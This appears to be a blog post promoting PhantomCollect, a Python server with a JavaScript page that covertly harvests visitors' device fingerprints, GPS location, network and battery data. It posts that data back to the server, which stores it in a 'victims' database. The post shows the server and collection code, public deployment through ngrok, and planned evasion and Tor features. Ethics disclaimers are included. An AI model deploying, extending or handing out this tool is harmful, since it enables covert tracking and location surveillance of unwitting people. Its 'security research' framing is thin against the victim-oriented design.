xsser01

๐Ÿ›ก๏ธ Advanced Web Data Collection: Building PhantomCollect for Security Research

๐Ÿ” Introduction

In cybersecurity, understanding what data web applications can collect matters to both attackers and defenders. This post walks through PhantomCollect, a stealth data collection framework I developed for legitimate security research and penetration testing.

Disclaimer: This tool is for educational purposes and authorized security testing only. Users are solely responsible for complying with all applicable laws.

๐Ÿ—๏ธ Architectural Overview

PhantomCollect uses a client-server architecture: a Python HTTP server delivers a page whose JavaScript reads data the browser exposes and posts it back to the server. The design shows how much a modern browser reveals to any page it loads.

Server-Side Python Implementation

from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import datetime
import sqlite3
import os

class SimpleDataHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        if self.path == '/':
            self.serve_html()
        else:
            self.send_error(404)

    def do_POST(self):
        if self.path == '/api/collect':
            self.handle_data_collection()
        else:
            self.send_error(404)

The Python backend serves two purposes:

· Web Interface: Delivers the data collection page
· API Endpoint: Processes and stores collected data
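
A minimal sketch of how the API endpoint might validate an incoming body before storing it. The helper name `parse_collect_payload`, the 64 KiB size cap, and the set of required keys are assumptions for illustration, not PhantomCollect's actual code; the key names mirror those used in the snippets in this post.

```python
import json

MAX_BODY_BYTES = 64 * 1024  # assumed cap; not taken from PhantomCollect


def parse_collect_payload(raw: bytes) -> dict:
    """Decode and validate a JSON body posted to /api/collect.

    Hypothetical helper: raises ValueError on anything unexpected so the
    handler can answer with HTTP 400 instead of storing malformed data.
    """
    if len(raw) > MAX_BODY_BYTES:
        raise ValueError("payload too large")
    try:
        data = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("body is not valid UTF-8 JSON") from exc
    if not isinstance(data, dict):
        raise ValueError("top-level JSON value must be an object")
    if not isinstance(data.get("timestamp"), str):
        raise ValueError("missing or non-string 'timestamp'")
    if not isinstance(data.get("collectedData"), dict):
        raise ValueError("missing or non-object 'collectedData'")
    return data
```

Rejecting bad input at the boundary keeps the storage and display code from having to guard against every malformed shape.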

Multi-Layer Storage System

def save_to_db(self, data):
    collected = data.get('collectedData', {})
    conn = sqlite3.connect('victims.db')
    try:
        # "with conn" commits on success and rolls back on error
        with conn:
            conn.execute('''INSERT INTO victims
                        (timestamp, ip, user_agent, location, device_info, all_data)
                        VALUES (?, ?, ?, ?, ?, ?)''',
                     (data['timestamp'],
                      collected.get('publicIP', 'Unknown'),
                      # tolerate payloads that lack basicInfo
                      collected.get('basicInfo', {}).get('userAgent', 'Unknown'),
                      self.extract_location(data),
                      self.extract_device_info(data),
                      json.dumps(data, indent=2)))
    finally:
        # close the connection even if the insert fails
        conn.close()
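
The INSERT above assumes a `victims` table already exists. A minimal sketch of a matching schema follows; the column names come from the INSERT statement, while the column types, the `id` primary key, the `init_db` name, and the in-memory database used for the demo are assumptions.

```python
import sqlite3

SCHEMA = """
CREATE TABLE IF NOT EXISTS victims (
    id          INTEGER PRIMARY KEY AUTOINCREMENT,  -- assumed surrogate key
    timestamp   TEXT NOT NULL,
    ip          TEXT,
    user_agent  TEXT,
    location    TEXT,
    device_info TEXT,
    all_data    TEXT  -- full JSON payload stored as text
)
"""


def init_db(path: str = ":memory:") -> sqlite3.Connection:
    """Open the database and create the table if it is missing."""
    conn = sqlite3.connect(path)
    with conn:  # commits the DDL on success
        conn.execute(SCHEMA)
    return conn


conn = init_db()
# PRAGMA table_info returns one row per column; index 1 is the column name.
columns = [row[1] for row in conn.execute("PRAGMA table_info(victims)")]
print(columns)
conn.close()
```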

🎯 The 10-Layer Data Collection Engine

The JavaScript frontend gathers data in several categories. Five of them are shown here:

  1. Basic Device Fingerprinting
allData.collectedData.basicInfo = {
    userAgent: navigator.userAgent,
    platform: navigator.platform,
    vendor: navigator.vendor,
    language: navigator.language,
    languages: navigator.languages
};

  2. Advanced Hardware Profiling
allData.collectedData.hardwareInfo = {
    hardwareConcurrency: navigator.hardwareConcurrency,  // Logical CPU cores
    deviceMemory: navigator.deviceMemory,                // Approximate RAM in GiB (coarse value; undefined in some browsers)
    maxTouchPoints: navigator.maxTouchPoints             // Touch capability
};

  3. Precise Geolocation Tracking
// position comes from the Geolocation API callback, after the user grants permission
allData.collectedData.gpsLocation = {
    latitude: position.coords.latitude,
    longitude: position.coords.longitude,
    accuracy: position.coords.accuracy,     // Accuracy in meters
    altitude: position.coords.altitude,
    speed: position.coords.speed            // Movement speed in meters per second
};

  4. Network Intelligence
// navigator.connection is not available in every browser
allData.collectedData.networkInfo = {
    effectiveType: navigator.connection.effectiveType,  // 4g, 3g, etc.
    downlink: navigator.connection.downlink,            // Estimated bandwidth in Mbps
    rtt: navigator.connection.rtt                       // Estimated round-trip time in ms
};

  5. Power Management Insights
// battery is the object resolved by navigator.getBattery(), where supported
allData.collectedData.batteryInfo = {
    charging: battery.charging,
    level: Math.round(battery.level * 100),     // Battery percentage
    chargingTime: battery.chargingTime,
    dischargingTime: battery.dischargingTime
};

📊 Real-Time Data Visualization

PhantomCollect prints each submission to the terminal as it arrives:

def print_victim_info(self, data):
    print(f"\n{'🎯'*20} NEW VICTIM DATA {'🎯'*20}")
    print(f"🕒 Time: {data['timestamp']}")

    ip = data['collectedData'].get('publicIP', 'Unknown')
    print(f"🌐 IP: {ip}")

    # Location intelligence
    if 'ipGeoInfo' in data['collectedData']:
        geo = data['collectedData']['ipGeoInfo']
        print(f"📍 Location: {geo.get('city', 'Unknown')}, {geo.get('country', 'Unknown')}")
        print(f"🏢 ISP: {geo.get('isp', 'Unknown')}")

    # Device capabilities
    basic = data['collectedData']['basicInfo']
    screen = data['collectedData']['screenInfo']
    print(f"📱 Platform: {basic['platform']}")
    print(f"🖥️ Screen: {screen['width']}x{screen['height']}")

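Sample terminal output (illustrative values; 192.168.1.100 is a private address, so a real run would show a public IP here):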

🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯 NEW VICTIM DATA 🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯🎯
🕒 Time: 2024-01-15T10:30:00.000Z
🌐 IP: 192.168.1.100
📍 Location: New York, United States
🏢 ISP: Comcast Cable
📱 Platform: Win32
🖥️ Screen: 1920x1080
🔋 Battery: 85%
📡 Network: 4g
💾 Memory: 8GB
⚡ Cores: 8

๐Ÿ›ก๏ธ Security Applications

Penetration Testing

PhantomCollect helps security professionals:

ยท Test data leakage in web applications
ยท Demonstrate privacy risks to stakeholders
ยท Train employees on digital footprint awareness

Security Research

ยท Browser fingerprinting analysis
ยท Privacy vulnerability assessment
ยท Incident response simulation

โš–๏ธ Ethical Considerations

When developing and using such tools, consider:

  1. Authorization: Only use on systems you own or have explicit permission to test
  2. Transparency: Clearly notify users about data collection
  3. Data Handling: Securely store and properly dispose of collected data
  4. Legal Compliance: Adhere to GDPR, CCPA, and other privacy regulations
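
Point 3 can be made concrete with a retention job. A minimal sketch, assuming a `victims` table like the one in the storage snippet, fixed-width ISO 8601 UTC timestamps like the one in the sample output, and a hypothetical 30-day retention period; `purge_old_rows` is an illustrative name, not part of PhantomCollect.

```python
import sqlite3
from datetime import datetime, timedelta, timezone


def purge_old_rows(conn: sqlite3.Connection, now: datetime, days: int = 30) -> int:
    """Delete rows older than `days` and return how many were removed.

    Relies on timestamps being fixed-width ISO 8601 UTC strings, which
    sort lexicographically in chronological order.
    """
    cutoff = (now - timedelta(days=days)).strftime("%Y-%m-%dT%H:%M:%S.000Z")
    with conn:  # commit on success, roll back on error
        cur = conn.execute("DELETE FROM victims WHERE timestamp < ?", (cutoff,))
    return cur.rowcount


# Demo on an in-memory table with only the column the purge needs.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE victims (timestamp TEXT NOT NULL)")
conn.executemany(
    "INSERT INTO victims (timestamp) VALUES (?)",
    [("2024-01-15T10:30:00.000Z",), ("2024-03-01T08:00:00.000Z",)],
)
now = datetime(2024, 3, 10, tzinfo=timezone.utc)
removed = purge_old_rows(conn, now)
print(removed)  # 1: only the January row is older than 30 days
```

Deleted rows can linger in free database pages. SQLite's `PRAGMA secure_delete = ON` overwrites deleted content with zeros, which is worth considering when the data is sensitive.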

🚀 Getting Started

Installation

pip install phantomcollect

Basic Usage

phantomcollect
# Access: http://localhost:8080

Advanced Deployment

# Make it publicly accessible
phantomcollect & ngrok http 8080

💡 Key Technical Insights

During development, several important findings emerged:

  1. Modern browsers expose significantly more data than most users realize
  2. Combining multiple data points creates unique device fingerprints
  3. Stealth techniques are essential for realistic security testing
  4. Proper data sanitization is crucial when handling sensitive information
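
Finding 2 can be illustrated with a few lines of Python. The sketch below hashes a handful of the attributes shown earlier into one identifier; the choice of fields, the SHA-256 digest, and the `fingerprint` helper are assumptions for illustration rather than PhantomCollect's method.

```python
import hashlib
import json


def fingerprint(attrs: dict) -> str:
    """Return a stable hex digest for a set of browser attributes."""
    # sort_keys makes the serialization independent of dict ordering
    canonical = json.dumps(attrs, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


# Values taken from the sample terminal output in this post.
device_a = {"platform": "Win32", "screen": "1920x1080", "cores": 8, "memoryGB": 8}
# The same attributes in a different key order.
reordered = {key: device_a[key] for key in sorted(device_a, reverse=True)}
# Same device class, different screen: one changed attribute changes the hash.
device_b = dict(device_a, screen="2560x1440")

print(fingerprint(device_a) == fingerprint(reordered))  # True
print(fingerprint(device_a) == fingerprint(device_b))   # False
```

Each attribute on its own is shared by many devices. It is the combination that narrows the set, which is why reducing or coarsening exposed values is a common browser-side defense.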

🔮 Future Enhancements

Planned features for PhantomCollect:

· Tor network integration for anonymous testing
· Advanced evasion techniques to bypass detection
· Machine learning analysis of collected data patterns
· Comprehensive reporting dashboard

🎯 Conclusion

PhantomCollect demonstrates the extensive data exposure capabilities of modern web technologies. For security professionals, understanding these vectors is essential for building more secure applications and educating users about digital privacy.

The tool serves as both an educational resource and a practical security testing framework, emphasizing the importance of ethical development and responsible disclosure in cybersecurity research.

Remember: With great power comes great responsibility. Always use such tools ethically and legally.


🔗 Resources & Official Channels

📦 Primary Sources & Distribution

· Codeberg (Main Repository): https://codeberg.org/xsser01/phantomcollect
· PyPI Package: https://pypi.org/project/phantomcollect/
· Arch Linux AUR: https://aur.archlinux.org/packages/phantomcollect
· Arch Linux Wiki: https://wiki.archlinux.org/title/User:Xsser01/Phantomcollect

🌐 Featured On & Community Presence

· SourceForge: https://sourceforge.net/projects/phantomcollect/
· AlternativeTo: https://alternativeto.net/software/phantomcollect/about/
· LibHunt: https://www.libhunt.com/r/phantomcollect
· Launchpad: https://launchpad.net/phantomcollect
· StackShare: https://stackshare.io/xsser01/phantomcollect
